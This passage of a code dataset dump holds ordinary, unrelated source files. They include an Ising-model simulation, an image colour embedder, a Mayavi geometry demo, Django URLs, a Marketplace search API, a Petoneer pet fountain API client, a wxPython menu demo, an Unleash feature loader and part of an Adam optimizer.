k_B = 1)\n # num_steps = Number of steps to run in total (including burnin steps)\n # num_burnin = Number of steps to use for the burnin process. 
This isn't\n #\tused in this code but you might need it if you change this to try and\n #\tget better convergence.\n # J = Interaction strength\n # B = Applied magnetic field\n # flip_prop = Total ratio of spins to possibly flip per step\n\n # Initialize variables\n M,E = 0,0 # Magnetization and Energy Initial Values\n Msamp, Esamp = [],[] #Arrays to hold magnetization and energy values\n\n # We obtain the sum of nearest neighbors by convoluting\n # this matrix with the spin matrix\n conv_mat = np.matrix('0 1 0; 1 0 1; 0 1 0')\n\n # Generate a random initial configuration\n spin = np.random.choice([-1,1],(N,N))\n\n try:\n __IPYTHON__\n steps = range(num_steps)\n except:\n if disable_tqdm:\n steps = range(num_steps)\n else:\n steps = tqdm(range(num_steps))\n\n # Evolve the system\n for step in steps:\n\n try:\n __IPYTHON__\n except:\n if disable_tqdm:\n pass\n else:\n steps.set_description(\"Working on T = %.2f\" % T)\n steps.refresh() # to show immediately the update\n\n #implement annealing in annealing.py file\n T_step = T_anneal(T, step, num_steps, num_burnin)\n B_step = B_anneal(B, step, num_steps, num_burnin)\n\n #Calculating the total spin of neighbouring cells\n neighbors = signal.convolve2d(spin,conv_mat,mode='same',boundary='wrap')\n\n #Sum up our variables of interest, normalize by N^2\n M = float(np.sum(spin))/float(N**2)\n Msamp.append(M)\n\n #Divide by two because of double counting\n E = float(-J*(np.sum((spin*neighbors)))/2.0)/float(N**2) - float(B_step)*M\n Esamp.append(E)\n\n #Calculate the change in energy of flipping a spin\n DeltaE = 2.0 * (J*(spin*neighbors) + float(B_step)*spin)\n\n #Calculate the transition\n p_trans = np.where(DeltaE >= 0.0, np.exp(-1.0*DeltaE/float(T_step)),1.0)\n #If DeltaE is positive, calculate the Boltzmann flipping probability.\n #If not, assign a transition probability of 1\n\n #Decide which transitions will occur\n transitions = [[-1 if (cell>random.random() and flip_prop>random.random()) else 1 for cell in row] for row in p_trans]\n #Perform the transitions\n spin = spin*transitions\n\n return Msamp, Esamp, spin\n","sub_path":"python/ising.py","file_name":"ising.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
+{"seq_id":"366467929","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder editor\n\nThis is a temporary script.\n\"\"\"\n\ndef mul(vector):\n a = 1\n for i in range(len(vector)):\n a = a*vector[i]\n print(a)\n\n#mul([1, 5, 9])","sub_path":"exercices/328/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
+{"seq_id":"539905351","text":"import numpy as np\nfrom PIL import Image\n\n\nclass ColorEmbedder:\n \"\"\"A class for embedding color information from an image.\"\"\"\n\n def __init__(self, n_bins: int = 8, alpha: float = 5):\n \"\"\"\n Initialize the ColorEmbedder object.\n\n Args:\n n_bins (int):\n Number of color bins to use.\n alpha (float):\n Standard deviation of the noise added to each pixel.\n\n \"\"\"\n self.n_bins = n_bins\n self.bins = np.linspace(0, 255, n_bins + 1)\n self.alpha = alpha\n\n def embed(self, image: Image) -> np.ndarray:\n \"\"\"\n Embed color information from the given image.\n\n The embedding process involves resizing the image, converting it to RGB,\n and creating a color histogram. 
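The resize target is 50x50 pixels, which keeps the pixel count small. 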
The histogram is composed of n_bins^3\n bins, where n_bins is the number of bins in each dimension (red, green,\n blue). Each pixel in the image is repeated 10 times and some noise is\n added to each pixel. This allows colours near the bin boundaries to fall\n into multiple bins, making the embedding more robust.\n\n Args:\n image (PIL.Image.Image):\n The input image.\n\n Returns:\n np.ndarray:\n The flattened color histogram as a 1D numpy array.\n\n \"\"\"\n rgb_image = image.convert(\"RGB\").resize(\n (50, 50),\n # resample using nearest neighbour to preserve the original colours.\n # using the default resample method (bicubic) will result in a\n # blurring/blending of colours\n resample=Image.NEAREST,\n )\n\n pixel_array = np.array(rgb_image).reshape(-1, 3)\n\n repeated_pixel_array = np.repeat(pixel_array, 10, axis=0)\n noise = np.random.normal(0, self.alpha, repeated_pixel_array.shape)\n pixel_array = repeated_pixel_array + noise\n\n histogram, _ = np.histogramdd(\n pixel_array,\n bins=[self.bins, self.bins, self.bins],\n )\n\n # make sure the vector is of unit length\n histogram = histogram / np.linalg.norm(histogram)\n\n return histogram.flatten()\n","sub_path":"knn-colours/pipeline/src/embedder.py","file_name":"embedder.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
+{"seq_id":"597759155","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/10/10 21:06\n# @Author : BingZhen Zhou\n# @contact : zbzhen@smail.hunnu.edu.cn\n# @File : demo.py\n# @version : Python 2.7.6\nfrom pointLinePlane import spaceElement, Frame, Axis, getcubepoints, setSCALING\nimport numpy as np\nfrom enthought.traits.api import HasTraits, Float, Int, Bool, Range, Str, Button, Instance\nfrom enthought.traits.ui.api import View, HSplit, Item, VGroup, EnumEditor, RangeEditor\nfrom enthought.tvtk.pyface.scene_editor import SceneEditor\nfrom enthought.mayavi.tools.mlab_scene_model import MlabSceneModel\nfrom enthought.mayavi.core.ui.mayavi_scene import MayaviScene\nfrom enthought.mayavi import mlab\nfrom tvtk.api import tvtk\nfrom tvtk.common import configure_input_data\n\n\n\nclass FieldViewer(HasTraits):\n \"\"\"3D scalar field viewer\"\"\"\n\n # value ranges of the three axes\n x0, x1 = Float(-5), Float(5)\n y0, y1 = Float(-5), Float(5)\n z0, z1 = Float(-5), Float(5)\n points = Int(50) # number of subdivision points\n autocontour = Bool(True) # whether to compute iso-surfaces automatically\n v0, v1 = Float(0.0), Float(1.0) # value range of the iso-surface\n contour = Range(\"v0\", \"v1\", 0.5) # iso-surface value\n function = Str(\"x*x*0.5 + y*y + z*z*2.0\") # scalar field function\n function_list = [\n \"x*x*0.5 + y*y + z*z*2.0\",\n \"x*y*0.5 + sin(2*x)*y +y*z*2.0\",\n \"x*y*z\",\n \"np.sin((x*x+y*y)/z)\"\n ]\n plotbutton = Button(u\"描画\")\n scene = Instance(MlabSceneModel, ()) # mayavi scene\n\n view = View(\n HSplit(\n VGroup(\n \"x0\",\"x1\",\"y0\",\"y1\",\"z0\",\"z1\",\n Item('points', label=u\"点数\"),\n Item('autocontour', label=u\"自动等值\"),\n Item('plotbutton', show_label=False),\n ),\n VGroup(\n Item('scene',\n editor=SceneEditor(scene_class=MayaviScene), # set up the mayavi editor\n resizable=True,\n height=300,\n width=350\n ),\n Item('function',\n editor=EnumEditor(name='function_list', evaluate=lambda x:x)),\n Item('contour',\n editor=RangeEditor(format=\"%1.2f\",\n low_name=\"v0\", high_name=\"v1\")\n ), show_labels=False\n )\n ),\n width = 500, resizable=True, title=u\"三维标量场观察器\"\n )\n\n def _plotbutton_fired(self):\n self.plot()\n\n\n # def _autocontour_changed(self):\n # \"handler for changes to the auto-contour setting\"\n # if hasattr(self, \"g\"):\n # self.g.contour.auto_contours = 
self.autocontour\n # if not self.autocontour:\n # self._contour_changed()\n #\n #\n # def _contour_changed(self):\n # \"handler for changes of the iso-surface value\"\n # if hasattr(self, \"g\"):\n # if not self.g.contour.auto_contours:\n # self.g.contour.contours = [self.contour]\n\n\n def plot(self):\n # mlab.figure(fgcolor=(0, 0, 1.0), bgcolor=(1.0, 1.0, 1.0), size=(700, 700))\n setSCALING(4)\n mlab.clf()\n v = mlab.gcf(engine=None)\n v.scene.background = (1, 1, 1)\n v.scene.foreground = (0, 0, 1)\n\n Axis(1.5,1.5,1.5).plot(arraymode=\"2darrow\")\n\n A = spaceElement([1,0,0])\n B = spaceElement([0,1,0])\n C = spaceElement([0,0,1])\n P = spaceElement([0,0,0])\n D = spaceElement([0.5,0.5,0])\n\n\n spaceElement(C, D).plot(linestyle=\"dashed\", color=(0,1,0))\n\n # spaceElement(A, B).plot()\n\n D.plot()\n A.plot()\n B.plot()\n C.plot()\n aa = A.plotText(\"A\",0.1)\n\n # B.plotText(\"B\")\n # C.plotText(\"C\")\n t = D.plotText(\"D\")\n # spaceElement(A, B, C).plotLine()\n\n ps = getcubepoints()\n a = [spaceElement(p) for p in ps]\n Frame(a[:4], a[4:]).plot()\n # spaceElement(a[0],a[2],a[4],a[6]).plotLine()\n\n spaceElement(a[0],a[2],a[6],a[4]).plot(colormap=\"Spectral\", opacity=self.contour)\n ABC = spaceElement(A, B, C)\n ABC.plot(colormap=\"Accent\", opacity=self.contour)\n ABC.getPerpendicularLine(a[0]).plot()\n # # print spaceElement(A, B, C).getDistanceFromPoint(a[7])\n # spaceElement(A, C).getParallelLine(D).plot()\n # spaceElement(A, C).getPerpendicularLine(D).plot()\n\n\n\n\n\n # And display text\n vtext = tvtk.VectorText()\n vtext.text = 'm'\n text_mapper = tvtk.PolyDataMapper()\n configure_input_data(text_mapper, vtext.get_output())\n vtext.update()\n p2 = tvtk.Property(color=(0, 0.3, 0.3))\n text_actor = tvtk.Follower(mapper=text_mapper, property=p2)\n text_actor.position = (0, 0, 0)\n v.scene.add_actor(text_actor)\n\n\n\n\napp = FieldViewer()\napp.configure_traits()\n\n\n\n\n\n\n","sub_path":"moviepy/三维动画课件/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
+{"seq_id":"264795216","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', 'restaurants.views.home', name='home'),\n url(r'^contact/$', 'restaurants.views.contact', name='contact'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^restaurants/$', 'restaurants.views.restaurant_list', name='restaurant_list'),\n url(r'^restaurants/(?P\d+)/$', 'restaurants.views.restaurant_detail', name='restaurant_detail'),\n url(r'^restaurants/(?P\d+)/review/$', 'restaurants.views.write_review', name='restaurant_review'),\n)","sub_path":"intro-track/eatwell/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
+{"seq_id":"536204496","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.3.0'\n\nsetup(name='collective.contentfiles2aws',\n version=version,\n description=\"Allows to store files and images on amazon s3 service.\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n classifiers=[\"Programming Language :: Python\"],\n keywords='Plone AWS',\n author='Taras Melnychuk',\n author_email='melnychuktaras@gmail.com',\n url='https://github.com/martinschoel/collective.contentfiles2aws.git',\n license='GPL',\n 
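# note (added comment): the tests extra defined further below pulls in plone.app.testing\n 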
packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['collective'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'boto',\n ],\n extras_require={'tests': ['plone.app.testing']},\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","sub_path":"pypi_install_script/collective.contentfiles2aws-1.3.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"59301738","text":"from django.conf.urls import url\n\nimport waffle\nfrom tastypie.authorization import ReadOnlyAuthorization\nfrom tastypie.throttle import BaseThrottle\nfrom tastypie.utils import trailing_slash\n\nfrom translations.helpers import truncate\n\nimport mkt\nfrom mkt.api.authentication import (SharedSecretAuthentication,\n OptionalOAuthAuthentication)\nfrom mkt.api.base import CORSResource, MarketplaceResource\nfrom mkt.api.resources import AppResource\nfrom mkt.api.serializers import SuggestionsSerializer\nfrom mkt.collections.constants import (COLLECTIONS_TYPE_BASIC,\n COLLECTIONS_TYPE_FEATURED,\n COLLECTIONS_TYPE_OPERATOR)\nfrom mkt.collections.filters import CollectionFilterSetWithFallback\nfrom mkt.collections.models import Collection\nfrom mkt.collections.serializers import CollectionSerializer\nfrom mkt.constants.features import FeatureProfile\nfrom mkt.search.views import _filter_search\nfrom mkt.search.forms import ApiSearchForm\nfrom mkt.webapps.models import Webapp\nfrom mkt.webapps.utils import es_app_to_dict\n\n\nclass SearchResource(CORSResource, MarketplaceResource):\n\n class Meta(AppResource.Meta):\n resource_name = 'search'\n allowed_methods = []\n detail_allowed_methods = []\n list_allowed_methods = ['get']\n authorization = ReadOnlyAuthorization()\n authentication = (SharedSecretAuthentication(),\n OptionalOAuthAuthentication())\n slug_lookup = None\n # Override CacheThrottle with a no-op.\n throttle = BaseThrottle()\n\n def get_resource_uri(self, bundle):\n # Link to the AppResource URI.\n return AppResource().get_resource_uri(bundle.obj)\n\n def get_search_data(self, request):\n form = ApiSearchForm(request.GET if request else None)\n if not form.is_valid():\n raise self.form_errors(form)\n return form.cleaned_data\n\n def get_feature_profile(self, request):\n profile = None\n if request.GET.get('dev') in ('firefoxos', 'android'):\n sig = request.GET.get('pro')\n if sig:\n profile = FeatureProfile.from_signature(sig)\n return profile\n\n def get_region(self, request):\n return getattr(request, 'REGION', mkt.regions.WORLDWIDE)\n\n def get_query(self, request, base_filters=None):\n region = self.get_region(request)\n return Webapp.from_search(request, region=region, gaia=request.GAIA,\n mobile=request.MOBILE, tablet=request.TABLET,\n filter_overrides=base_filters)\n\n def apply_filters(self, request, qs, data=None):\n # Build device features profile filter.\n profile = self.get_feature_profile(request)\n\n # Build region filter.\n region = self.get_region(request)\n\n return _filter_search(request, qs, data, region=region,\n profile=profile)\n\n def paginate_results(self, request, qs):\n paginator = self._meta.paginator_class(request.GET, qs,\n resource_uri=self.get_resource_list_uri(),\n limit=self._meta.limit)\n page = paginator.page()\n page['objects'] = self.rehydrate_results(request, page['objects'])\n return page\n\n def rehydrate_results(self, request, qs):\n # Rehydrate 
the results as per tastypie.\n objs = []\n for obj in qs:\n obj.pk = obj.id\n objs.append(self.build_bundle(obj=obj, request=request))\n return [self.full_dehydrate(bundle) for bundle in objs]\n\n def get_list(self, request=None, **kwargs):\n form_data = self.get_search_data(request)\n\n base_filters = {\n 'type': form_data['type'],\n }\n\n qs = self.get_query(request, base_filters=base_filters)\n qs = self.apply_filters(request, qs, data=form_data)\n page = self.paginate_results(request, qs)\n\n # This isn't as quite a full as a full TastyPie meta object,\n # but at least it's namespaced that way and ready to expand.\n to_be_serialized = self.alter_list_data_to_serialize(request, page)\n return self.create_response(request, to_be_serialized)\n\n def dehydrate(self, bundle):\n obj = bundle.obj\n amo_user = getattr(bundle.request, 'amo_user', None)\n\n bundle.data.update(es_app_to_dict(obj, region=bundle.request.REGION.id,\n profile=amo_user,\n request=bundle.request))\n\n return bundle\n\n def override_urls(self):\n return [\n url(r'^(?P%s)/featured%s$' %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('with_featured'), name='api_with_featured'),\n ]\n\n def with_featured(self, request, **kwargs):\n return WithFeaturedResource().dispatch('list', request, **kwargs)\n\n\nclass WithFeaturedResource(SearchResource):\n\n class Meta(SearchResource.Meta):\n authorization = ReadOnlyAuthorization()\n authentication = OptionalOAuthAuthentication()\n detail_allowed_methods = []\n fields = SearchResource.Meta.fields + ['id', 'cat']\n list_allowed_methods = ['get']\n resource_name = 'search/featured'\n slug_lookup = None\n\n def create_response(self, *args, **kwargs):\n response = super(WithFeaturedResource, self).create_response(\n *args, **kwargs)\n filter_fallbacks = getattr(self, 'filter_fallbacks', {})\n for name, value in filter_fallbacks.items():\n response['API-Fallback-%s' % name] = ','.join(value)\n return response\n\n def collections(self, request, collection_type=None, limit=1):\n filters = request.GET.dict()\n filters.setdefault('region', self.get_region(request).slug)\n if collection_type is not None:\n qs = Collection.public.filter(collection_type=collection_type)\n else:\n qs = Collection.public.all()\n qs = CollectionFilterSetWithFallback(filters, queryset=qs).qs\n serializer = CollectionSerializer(qs[:limit],\n context={'request': request})\n return serializer.data, getattr(qs, 'filter_fallback', None)\n\n def alter_list_data_to_serialize(self, request, data):\n\n if waffle.switch_is_active('rocketfuel'):\n types = (\n ('collections', COLLECTIONS_TYPE_BASIC),\n ('featured', COLLECTIONS_TYPE_FEATURED),\n ('operator', COLLECTIONS_TYPE_OPERATOR),\n )\n self.filter_fallbacks = {}\n for name, col_type in types:\n data[name], fallback = self.collections(request,\n collection_type=col_type)\n if fallback:\n self.filter_fallbacks[name] = fallback\n else:\n form_data = self.get_search_data(request)\n region = getattr(request, 'REGION', mkt.regions.WORLDWIDE)\n cat_slug = form_data.get('cat')\n if cat_slug:\n cat_slug = [cat_slug]\n\n # Filter by device feature profile.\n profile = self.get_feature_profile(request)\n\n qs = Webapp.featured(cat=cat_slug, region=region, profile=profile)\n\n bundles = (self.build_bundle(obj=obj, request=request) for obj in\n qs)\n data['featured'] = [AppResource().full_dehydrate(bundle)\n for bundle in bundles]\n\n # Alter the _view_name so that statsd logs seperately from search.\n request._view_name = 'featured'\n\n return data\n\n\nclass 
SuggestionsResource(SearchResource):\n\n    class Meta(SearchResource.Meta):\n        authorization = ReadOnlyAuthorization()\n        fields = ['name', 'manifest_url']\n        resource_name = 'suggest'\n        limit = 10\n        serializer = SuggestionsSerializer(['suggestions+json'])\n\n    def determine_format(self, request):\n        return 'application/x-suggestions+json'\n\n    def get_search_data(self, request):\n        data = super(SuggestionsResource, self).get_search_data(request)\n        self.query = data.get('q', '')\n        return data\n\n    def alter_list_data_to_serialize(self, request, data):\n        return data\n\n    def paginate_results(self, request, qs):\n        return self.rehydrate_results(request, qs[:self._meta.limit])\n\n    def rehydrate_results(self, request, qs):\n        names = []\n        descriptions = []\n        urls = []\n        icons = []\n        for obj in qs:\n            # Tastypie expects obj.pk to be present, so set it manually.\n            obj.pk = obj.id\n            data = self.full_dehydrate(self.build_bundle(obj=obj,\n                                                         request=request))\n            names.append(data['name'])\n            descriptions.append(data['description'])\n            urls.append(data['absolute_url'])\n            icons.append(data['icon'])\n        return [self.query, names, descriptions, urls, icons]\n\n    def dehydrate(self, bundle):\n        data = super(SuggestionsResource, self).dehydrate(bundle).data\n        return {\n            'description': truncate(data['description']),\n            'name': data['name'],\n            'absolute_url': data['absolute_url'],\n            'icon': data['icons'][64],\n        }\n","sub_path":"mkt/search/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"498836596","text":"\"\"\"\nHolds device status information for an individual Petoneer smart pet fountain\n\"\"\"\nfrom datetime import time, date, datetime\nimport json\n\nfrom petoneerErrors import *\nfrom petoneerFountainDetails import *\nfrom petoneerHelpers import *\n\nclass PetoneerFountain:\n\n    \"\"\"\n    Class to interface with the cloud-based API for the Revogi Smart Home equipment\n    \"\"\"\n\n    def __init__(self, fountain_serial_number:str, api_access_token:str):\n        self._id = fountain_serial_number\n        self._access_token = api_access_token\n        self._device_info_json = None\n        self._device_info_last_updated = None\n        self._device_schedule_info_json = None\n        self._pump = PetoneerFountainDetails_PumpDetails(self)\n        self._water = PetoneerFountainDetails_WaterDetails(self)\n        self._filter = PetoneerFountainDetails_FilterDetails(self)\n        self._led_display = PetoneerFountainDetails_LedDetails(self)\n\n        # Initialise property values based on provided JSON data\n        self.update()\n\n    def to_json(self):\n        return json.dumps(self, indent=4, default=lambda o: o.__dict__)  # dumps, not dump: we want a string, not file output\n\n    # def __str__(self):\n    #     return self.to_json(self)\n\n    def _debug(self, msg):\n        print(msg)\n        #pass\n        return\n\n    def update(self):\n        # Retrieve up-to-date info from server API if last update was more than\n        # 30 seconds ago...\n        if (self._device_info_last_updated is None) or (\n            (datetime.now() - self._device_info_last_updated).total_seconds() > 30):\n            \n            self._getDeviceDetails()\n\n        # Update all values based on new device info JSON data\n        self._pump.update(self._device_info_json, self._device_schedule_info_json)\n        self._water.update(self._device_info_json)\n        self._filter.update(self._device_info_json)\n        self._led_display.update(self._device_info_json)\n        ##\n        ## TODO: Parse JSON and update properties with new values\n\n    def _getDeviceDetails(self):\n        if (self._id == \"\"):\n            raise PetoneerInvalidArgument('PetoneerFountain._req', 
'PetoneerFountain.device_id', 'The device serial number must be provided')\n\n        self._debug(f\"Getting details for device {self._id}\")\n\n        payload = { \n            \"sn\": self._id, \n            \"protocol\": \"3\" \n        }\n\n        #\n        # Request main device details from Petoneer API\n        #\n        resp = PetoneerHelpers.getAPIrequest(API_DEVICE_DETAILS_PATH, payload, self._access_token)\n\n        if(resp.status_code == 200):\n            json_resp = resp.json()\n\n            if (json_resp['code'] == 200):\n                self._device_info_json = json_resp['data']\n            else:\n                raise PetoneerInvalidServerResponse(resp.status_code, resp.url, resp.text, 'Unable to obtain Petoneer Fountain device details - Unexpected Server Response')\n        else:\n            raise PetoneerServerError(resp.status_code, resp.url, resp.text, 'Unable to obtain Petoneer Fountain device details - Server Error')\n\n        #\n        # Second API call to obtain any configured fountain operating schedule info\n        #\n        resp = PetoneerHelpers.getAPIrequest(API_DEVICE_SCHEDULE_DETAILS_PATH, payload, self._access_token)\n\n        if(resp.status_code == 200):\n            json_resp = resp.json()\n\n            if (json_resp['code'] == 200):\n                self._device_schedule_info_json = json_resp['data']\n            else:\n                raise PetoneerInvalidServerResponse(resp.status_code, resp.url, resp.text, 'Unable to obtain Petoneer Fountain schedule details - Unexpected Server Response')\n        else:\n            raise PetoneerServerError(resp.status_code, resp.url, resp.text, 'Unable to obtain Petoneer Fountain schedule details - Server Error')\n\n        self._device_info_last_updated = datetime.now()\n\n    @property\n    def device_id(self):\n        return self._id\n\n    @property\n    def pump(self):\n        return self._pump\n\n    @property\n    def water(self):\n        return self._water\n\n    @property\n    def filter(self):\n        return self._filter\n\n    @property\n    def led_display(self):\n        return self._led_display\n\n# -------------------------------------------------\n","sub_path":"petoneerFountain.py","file_name":"petoneerFountain.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"314993784","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#-----------------------------------------------------------------------------\n# Purpose: menu item, find by id\n#-----------------------------------------------------------------------------\n\nimport wx\n\nclass Frame(wx.Frame):\n\n    def __init__(self):\n        super(self.__class__, self).__init__(parent=None, id=-1, title='Find Item by Id', size=(400, 250))\n        panel = wx.Panel(parent=self)\n\n        self.txt = wx.TextCtrl(parent=panel, id=-1, value='&New Item')\n        btn = wx.Button(parent=panel, id=-1, label='Add Menu Item')\n        self.Bind(event=wx.EVT_BUTTON, handler=self.OnAddItem, source=btn)\n\n        sizer = wx.BoxSizer(wx.HORIZONTAL)\n        sizer.Add(item=(-1, -1), proportion=1)\n        sizer.Add(item=self.txt, proportion=0, flag=wx.ALIGN_CENTER_VERTICAL)\n        sizer.Add(item=btn, proportion=0, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT, border=5)\n        sizer.Add(item=(-1, -1), proportion=1)\n        panel.SetSizer(sizer)\n\n        self.menu = wx.Menu()\n        simple = self.menu.Append(id=-1, text='&Simple', help='', kind=wx.ITEM_NORMAL)\n        self.menu.AppendSeparator()\n        exit = self.menu.Append(id=-1, text='E&xit', help='', kind=wx.ITEM_NORMAL)\n        self.Bind(event=wx.EVT_MENU, handler=self.OnSimple, source=simple)\n        self.Bind(event=wx.EVT_MENU, handler=self.OnExit, source=exit)\n\n        mb = wx.MenuBar()\n        mb.Append(menu=self.menu, title='&Menu')\n        self.SetMenuBar(mb)\n\n        # layout\n        self.CenterOnScreen()\n\n    def OnSimple(self, event):\n        wx.MessageBox(message='You 
selected the simple menu item.')\n\n def OnExit(self, event):\n self.Close()\n\n def OnAddItem(self, event):\n item = self.menu.Insert(pos=1, id=-1, text=self.txt.GetValue(), help='', kind=wx.ITEM_NORMAL)\n self.Bind(event=wx.EVT_MENU, handler=self.OnNewItemSelected, source=item)\n\n def OnNewItemSelected(self, event):\n #wx.MessageBox(message='You selected a ' + self.txt.GetValue().replace('&', ''))\n mb = self.GetMenuBar()\n id = event.GetId()\n item = mb.FindItemById(id)\n text = item.GetText()\n wx.MessageBox(message='You selected is `%s`' % text.replace('&', ''))\n\n\nclass App(wx.App):\n\n def OnInit(self):\n frame = Frame()\n self.SetTopWindow(frame)\n frame.Show()\n return True\n\nif __name__ == '__main__':\n\n app = App()\n app.MainLoop()\n\n\n\n\n\n\n","sub_path":"use_menu_find_item_by_id_75.py","file_name":"use_menu_find_item_by_id_75.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"258261861","text":"from fcache.cache import FileCache\nfrom UnleashClient.features import Feature\nfrom UnleashClient.strategies import ApplicationHostname, Default, GradualRolloutRandom, \\\n GradualRolloutSessionId, GradualRolloutUserId, UserWithId, RemoteAddress\nfrom UnleashClient.constants import FEATURES_URL\n\nSTRATEGY_TO_OBJECT = {\n \"applicationHostname\": ApplicationHostname,\n \"default\": Default,\n \"gradualRolloutRandom\": GradualRolloutRandom,\n \"gradualRolloutSessionId\": GradualRolloutSessionId,\n \"gradualRolloutUserId\": GradualRolloutUserId,\n \"remoteAddress\": RemoteAddress,\n \"userWithId\": UserWithId\n}\n\n\ndef _create_strategies(provisioning: dict) -> list:\n feature_strategies = []\n\n for strategy in provisioning:\n feature_strategies.append(STRATEGY_TO_OBJECT[strategy[\"name\"]](strategy[\"parameters\"]))\n\n return feature_strategies\n\n\ndef _create_feature(provisioning: dict) -> Feature:\n return Feature(name=provisioning[\"name\"],\n enabled=provisioning[\"enabled\"],\n strategies=_create_strategies(provisioning[\"strategies\"]))\n\n\ndef load_features(cache: FileCache,\n strategies: dict) -> None:\n \"\"\"\n Caching\n\n :param cache: Should be the cache class variable from UnleashClient\n :param strategies: Should be the features class variable from UnleashClient\n :return:\n \"\"\"\n # Pull raw provisioning from cache.\n feature_provisioning = cache[FEATURES_URL]\n\n # Parse provisioning\n parsed_features = {}\n feature_names = [d[\"name\"] for d in feature_provisioning[\"features\"]]\n\n for provisioning in feature_provisioning[\"features\"]:\n parsed_features[provisioning[\"name\"]] = provisioning\n\n # Delete old features/cache\n for feature in list(strategies.keys()):\n if feature not in feature_names:\n del strategies[feature]\n\n # Update existing objects\n for feature in list(strategies.keys()):\n feature_for_update = strategies[feature]\n\n feature_for_update.enabled = parsed_features[feature][\"enabled\"]\n feature_for_update.strategies = _create_strategies(parsed_features[feature][\"strategies\"])\n\n # Handle creation or deletions\n new_features = list(set(feature_names) - set(strategies.keys()))\n\n for feature in new_features:\n strategies[feature] = _create_feature(parsed_features[feature])\n","sub_path":"UnleashClient/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"460429453","text":"import numpy as np\nfrom .Optimizer 
import Optimizer\n\nclass AdamOptimizer(Optimizer):\n\n def __init__(self, beta1=0.9, beta2=0.999, epsilon=1e-8, t=2):\n \"\"\"\n v -- python dictionary containing the current velocity:\n v['dW' + str(l)] = ...\n v['db' + str(l)] = ...\n s -- python dictionary that will contain the exponentially weighted average of the squared gradient.\n s[\"dW\" + str(l)] = ...\n s[\"db\" + str(l)] = ...\n beta -- the momentum hyperparameter, scalar\n t -- \n \"\"\"\n super(AdamOptimizer, self).__init__()\n \n self.beta1 = beta1\n self.beta2 = beta2\n self.epsilon = epsilon\n self.t = t\n self.v = {}\n self.s = {}\n \n def initialize(self, layer_dims, initialization=\"he\"):\n \"\"\"\n Arguments:\n layer_dims -- python array (list) containing the dimensions of each layer in our network\n initialization -- defines the initialization method (\"random\" or \"he\")\n\n Returns:\n parameters -- python dictionary containing your parameters \"W1\", \"b1\", ..., \"WL\", \"bL\":\n Wl -- weight matrix of shape (layer_dims[l], layer_dims[l-1])\n bl -- bias vector of shape (layer_dims[l], 1)\n \"\"\"\n parameters = super(AdamOptimizer, self).initialize(layer_dims, initialization=\"he\")\n\n L = len(parameters) // 2 # number of layers in the neural networks\n\n # Initialize v, s. Input: \"parameters\". Outputs: \"v, s\".\n for l in range(L):\n self.v[\"dW\" + str(l + 1)] = np.zeros_like(parameters[\"W\" + str(l + 1)])\n self.v[\"db\" + str(l + 1)] = np.zeros_like(parameters[\"b\" + str(l + 1)])\n\n self.s[\"dW\" + str(l+1)] = np.zeros_like(parameters[\"W\" + str(l + 1)])\n self.s[\"db\" + str(l+1)] = np.zeros_like(parameters[\"b\" + str(l + 1)])\n \n return parameters\n \n def update_parameters(self, parameters, grads, learning_rate):\n \"\"\"\n Update parameters using Adam\n\n Arguments:\n parameters -- python dictionary containing your parameters \n grads -- python dictionary containing your gradients, output of L_model_backward\n learning_rate -- the learning rate, scalar.\n\n Returns:\n parameters -- python dictionary containing your updated parameters \n parameters[\"W\" + str(l)] = ... \n parameters[\"b\" + str(l)] = ...\n \"\"\"\n\n L = len(parameters) // 2 # number of layers in the neural network\n v_corrected = {} # Initializing first moment estimate, python dictionary\n s_corrected = {} # Initializing second moment estimate, python dictionary\n self.t += 1\n\n # Perform Adam update on all parameters\n for l in range(L):\n # Moving average of the gradients. Inputs: \"v, grads, beta1\". Output: \"v\".\n self.v[\"dW\" + str(l + 1)] = self.beta1 * self.v[\"dW\" + str(l + 1)] + (1 - self.beta1) * grads['dW' + str(l + 1)]\n self.v[\"db\" + str(l + 1)] = self.beta1 * self.v[\"db\" + str(l + 1)] + (1 - self.beta1) * grads['db' + str(l + 1)]\n\n # Compute bias-corrected first moment estimate. Inputs: \"v, beta1, t\". Output: \"v_corrected\".\n v_corrected[\"dW\" + str(l + 1)] = self.v[\"dW\" + str(l + 1)] / (1 - np.power(self.beta1, self.t))\n 